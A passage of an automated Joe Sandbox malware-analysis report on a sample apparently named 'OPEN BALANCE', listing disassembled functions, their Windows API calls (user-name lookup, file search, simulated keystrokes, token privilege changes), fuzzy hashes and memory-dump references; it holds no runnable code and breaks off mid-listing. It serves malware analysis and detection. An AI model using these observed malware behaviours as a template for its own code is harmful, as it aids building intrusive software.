Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: da38abcb8776de74e1fcb5ac3b256ab04e7ad27a78d4fae4ea10af97ad899014
Instruction ID: 2ac6373f417d8ebbf48f103ccd56e12b35b58f1e3adbb427e3503d70d7926fd8
Opcode Fuzzy Hash: da38abcb8776de74e1fcb5ac3b256ab04e7ad27a78d4fae4ea10af97ad899014
Instruction Fuzzy Hash: 4B412872500619AFCB249FB9DC89DAB77B8FB84354F10826DF909D7285E670DD41CB50

Function 0089D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 0089D28C

Strings

X64, xrefs: 0089D2A8

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: 0fed8144fa502257d76f40bb3eec8ba2f5e2ec09c6cba57b252f6898c062b3f8
Instruction ID: 7aa7662d56b6865bd84e4a6aa4011f5b6620660648efa66ed3796f27ccd8a27a
Opcode Fuzzy Hash: 0fed8144fa502257d76f40bb3eec8ba2f5e2ec09c6cba57b252f6898c062b3f8
Instruction Fuzzy Hash: B5D0C9B580121DEACF90DB90DC88DD9B37CFB14309F100252F506E2080D73095488F10

Function 0086CAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction ID: 023b96ba1370262cf5d907b94f623bdff924deb4e4ba54148c7029d81f1a1b1f
Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction Fuzzy Hash: 54021B71E002199FDF14CFA9D8806ADFBF5FF88314F25816AD959EB380D731AA418B94

Function 008597C0 Relevance: 3.1, APIs: 2, Instructions: 80nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00859BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00859BB2

Part of subcall function 00859944: GetWindowLongW.USER32(?,000000EB), ref: 00859952

GetParent.USER32(?), ref: 008973A3
NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?), ref: 0089742D

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: LongWindow$DialogNtdllParentProc_
String ID:
API String ID: 314495775-0
Opcode ID: 4036fb0559c80f63edda6167bcd67df124a8eb2a2acd25213fd4f22563a7e09e
Instruction ID: 124f1806a39af4a9c0b723a6316b0e3802e3171d5baba21530a5add807e05e7a
Opcode Fuzzy Hash: 4036fb0559c80f63edda6167bcd67df124a8eb2a2acd25213fd4f22563a7e09e
Instruction Fuzzy Hash: D521DD30614104EFCF25AF28CC49AA93BA1FF0A371F084265FE658B2A2D3308D55EA40

Function 008B68EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 008B6918
FindClose.KERNEL32(00000000), ref: 008B6961

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: a551a81d670564689676f6f4a1fa5c8342e4d1c1186c2644eb81cf297a80b264
Instruction ID: a5b1533b5eeaadfc699aabc7d8808150619429f09c17e51d113a3c80b868334f
Opcode Fuzzy Hash: a551a81d670564689676f6f4a1fa5c8342e4d1c1186c2644eb81cf297a80b264
Instruction Fuzzy Hash: 1D1190316042159FD710DF29D484A16BBE5FF85328F14C699E869CF3A2DB34EC05CB91

Function 008D90A1 Relevance: 3.0, APIs: 2, Instructions: 44nativewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00859BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00859BB2

NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,0089769C,?,?,?), ref: 008D9111

Part of subcall function 00859944: GetWindowLongW.USER32(?,000000EB), ref: 00859952

SendMessageW.USER32(?,00000401,00000000,00000000), ref: 008D90F7

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: LongWindow$DialogMessageNtdllProc_Send
String ID:
API String ID: 1273190321-0
Opcode ID: 22111773737bbc9717ad6c1bf4079c96ac122a4639e58b4ab4cd4779d85c0c7b
Instruction ID: c8e89c460216c6bf569decbb49c40df52aa4ca9d27aa8bc8a561c348f125b091
Opcode Fuzzy Hash: 22111773737bbc9717ad6c1bf4079c96ac122a4639e58b4ab4cd4779d85c0c7b
Instruction Fuzzy Hash: 7E01F130200204BBDB209F14EC49EA63BB2FB85325F00026AF9955B2E0CB326C41DB11

Function 008B37B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,008C4891,?,?,00000035,?), ref: 008B37E4
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,008C4891,?,?,00000035,?), ref: 008B37F4

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 43c8214a694ce8778e32eb6dd6d8aa07efdff96de1e2863ff4bc4093ca94d77e
Instruction ID: 71411960193777dc371d633806385a4842af9d6ec772a7fff6a69f161848f91c
Opcode Fuzzy Hash: 43c8214a694ce8778e32eb6dd6d8aa07efdff96de1e2863ff4bc4093ca94d77e
Instruction Fuzzy Hash: ABF0E5B06052296AEB20276A9C4DFEB3BAEFFC4761F000275F509D2281DD609904C7B1

Function 008D9400 Relevance: 3.0, APIs: 2, Instructions: 32nativeCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 008D9423
NtdllDialogWndProc_W.NTDLL(?,00000200,?,00000000,?,?,00000000,00000000,?,0089776C,?,?,?,?,?), ref: 008D944C

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: ClientDialogNtdllProc_Screen
String ID:
API String ID: 3420055661-0
Opcode ID: bc13727533f80b38ed126ed6cc40081d0d5786be6ee0ef685a1d6a927a60d29e
Instruction ID: 902da0b412d8d3119f76c5446523ef357bd9bdcec50525f53e4c301e971b1150
Opcode Fuzzy Hash: bc13727533f80b38ed126ed6cc40081d0d5786be6ee0ef685a1d6a927a60d29e
Instruction Fuzzy Hash: 81F03A72400218FFEF048F91EC09DAE7BB9FB44351F00425AF945A2160D375AA50EBA0

Function 008AB226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 008AB25D
keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 008AB270

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 720dab6483781e5180666e712822248e6629c9c9a980547faf915df274f54f7b
Instruction ID: 39064ca8ffeca8de80cb86442b766e546116f50649a5d53d9b4660d93d42dd1c
Opcode Fuzzy Hash: 720dab6483781e5180666e712822248e6629c9c9a980547faf915df274f54f7b
Instruction Fuzzy Hash: 47F01D7180424EABEB059FA4C805BAE7BB4FF05309F00814AF955A6192C7798611DF94

Function 008A10BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,008A11FC), ref: 008A10D4
CloseHandle.KERNEL32(?,?,008A11FC), ref: 008A10E9

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 2be0ef18e0a0b2479173404c4832776e248b28bdec43397c9dac3d4affd776cc
Instruction ID: 1843003482312f5f0ba3bdc4556471fe11ca2e49c3c8242e5c8a73e4133e01f2
Opcode Fuzzy Hash: 2be0ef18e0a0b2479173404c4832776e248b28bdec43397c9dac3d4affd776cc
Instruction Fuzzy Hash: C1E04F32004601AEF7252B15FC0AE777BA9FB04311F10892EF9A5C04B1DB626C90DB10

Function 008D953A Relevance: 3.0, APIs: 2, Instructions: 21nativeCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 008D9542
NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,008976FB,?,?,?,?), ref: 008D956C

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: 77bc1116b46b1f945ad1b80b16f19c736e102fbd3ff4bc2a9adb74618dede262
Instruction ID: 55909a26c3567567e01dfe18bb9a7e02d0ec37bd5368e62ab5a0034c728a53f1
Opcode Fuzzy Hash: 77bc1116b46b1f945ad1b80b16f19c736e102fbd3ff4bc2a9adb74618dede262
Instruction Fuzzy Hash: AFE08C30144219BBFB150F19EC0AFB93B28FB00BA1F10832AF997980E1D7B199D0E260

Function 0084CAF0 Relevance: 1.9, Strings: 1, Instructions: 659COMMON

Download Yara Rule

Strings

Variable is not of type 'Object'., xrefs: 00890C40

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID:
String ID: Variable is not of type 'Object'.
API String ID: 0-1840281001
Opcode ID: a51b3c02db35a55e80f8c51734a89523282101cfd6884a6cd5da381caa13c4e7
Instruction ID: bcb8e6644033072f87c3cb00670973e8d64dc2ea810c92c3ced170220b6d81be
Opcode Fuzzy Hash: a51b3c02db35a55e80f8c51734a89523282101cfd6884a6cd5da381caa13c4e7
Instruction Fuzzy Hash: 7D32597090121C9FCF54EF94C885AEDB7B9FF05308F148169E806EB292DB75AE49CB61

Function 0087676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00876766,?,?,00000008,?,?,0087FEFE,00000000), ref: 00876998

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 04814091a4a64dd84586e7729818b446d522ea46f0bb1ea8cb4c1a8cdc8ba049
Instruction ID: 58a193adc3f46c034a484f1788d24fd97f1fa401c70db927f77d045b4469deeb
Opcode Fuzzy Hash: 04814091a4a64dd84586e7729818b446d522ea46f0bb1ea8cb4c1a8cdc8ba049
Instruction Fuzzy Hash: D2B16C31510A099FD719CF28C486B647BE0FF05368F29C658E8ADCF2A6D335D9A1CB40

Function 0085B119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON

Download Yara Rule

Strings

, xrefs: 0089851F

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: ad31b83bb158c78e28b070a7a9437b11073ee8b60b91935570a7127fef65342b
Instruction ID: 2a32031af1fbc9849e9bd9b5b380b187d5b63006fd2c1aaef1e7d0ecca0de739
Opcode Fuzzy Hash: ad31b83bb158c78e28b070a7a9437b11073ee8b60b91935570a7127fef65342b
Instruction Fuzzy Hash: 58124D7190022ADFCF24DF58C880AEEB7F5FF58710F14819AE849EB251DB349A85CB94

Function 008DA2D7 Relevance: 1.6, APIs: 1, Instructions: 68nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00859BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00859BB2

NtdllDialogWndProc_W.NTDLL(?,00000112,?,?), ref: 008DA38F

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: a46f2bb5d399a527319813fffa3e8f541e5fc40f9ce32a4169e759aaabf13f81
Instruction ID: 9e3dff94d0cb72c802442308a2b9062e42a7ff83f3f5483b2739a8ed8df83b77
Opcode Fuzzy Hash: a46f2bb5d399a527319813fffa3e8f541e5fc40f9ce32a4169e759aaabf13f81
Instruction Fuzzy Hash: 3D11EE20204215AAFB2D1B2CCD19BBD3B56FB81764F348326FA219A3E1CB618D41D257

Function 008D87B2 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00859944: GetWindowLongW.USER32(?,000000EB), ref: 00859952

CallWindowProcW.USER32(?,?,00000020,?,?), ref: 008D87F3

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Window$CallLongProc
String ID:
API String ID: 4084987330-0
Opcode ID: 54b4a25e6198ac01fcd88f8eb1378c22feec84d9effda88e80879fdcea669779
Instruction ID: 7f294a02921d85eb77101188137c38189c7d5ee505430be8aabacaedf8ee1b32
Opcode Fuzzy Hash: 54b4a25e6198ac01fcd88f8eb1378c22feec84d9effda88e80879fdcea669779
Instruction Fuzzy Hash: A2F0FF3150410DFFCF059F54EC54CB93BA5FB09361B148656FD559A6A1CB32AC60EF50

Function 008D8AAA Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00859BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00859BB2

Part of subcall function 0085912D: GetCursorPos.USER32(?), ref: 00859141
Part of subcall function 0085912D: ScreenToClient.USER32(00000000,?), ref: 0085915E
Part of subcall function 0085912D: GetAsyncKeyState.USER32(00000001), ref: 00859183
Part of subcall function 0085912D: GetAsyncKeyState.USER32(00000002), ref: 0085919D

NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,00897818,?,?,?,?,?,00000001,?), ref: 008D8AF8

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
String ID:
API String ID: 2356834413-0
Opcode ID: 027e06af14ef7926a9bcd8a127f7a9dd7a923fa8184982ecc5256a5453d0438b
Instruction ID: 404051eb1202e42d5f7e2e5347ca6b5f746b79e01edcab8cbcddea16cab4c2f4
Opcode Fuzzy Hash: 027e06af14ef7926a9bcd8a127f7a9dd7a923fa8184982ecc5256a5453d0438b
Instruction Fuzzy Hash: A8F08230200229EBEF146F19D80AAAA3F61FB007A1F004116FD165A291DBB699A0DBE5

Function 00859052 Relevance: 1.5, APIs: 1, Instructions: 27nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00859BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00859BB2

NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,?), ref: 00859096

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
